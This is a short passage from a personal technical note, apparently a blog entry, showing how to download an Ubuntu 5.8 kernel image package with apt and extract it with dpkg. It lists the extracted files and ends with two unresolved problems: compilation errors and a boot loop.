Pick whichever you like. The Aliyun mirror I use does not seem to have the latest 5.11 image, so 5.8 is used here as an example:

sudo apt download linux-image-5.8.0-43-generic

The download is a deb file; extract it

$ dpkg -X ./linux-image-5.8.0-43-generic_5.8.0-43.49~20.04.1_amd64.deb extract
./
./boot/
./boot/vmlinuz-5.8.0-43-generic
./usr/
./usr/share/
./usr/share/doc/
./usr/share/doc/linux-image-5.8.0-43-generic/
./usr/share/doc/linux-image-5.8.0-43-generic/changelog.Debian.gz
./usr/share/doc/linux-image-5.8.0-43-generic/copyright

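Problems encountered

1. Linux kernel compilation errors

2. The kernel failed to boot and got stuck in a loop (the problem disappeared when I redid everything; the cause is still unknown)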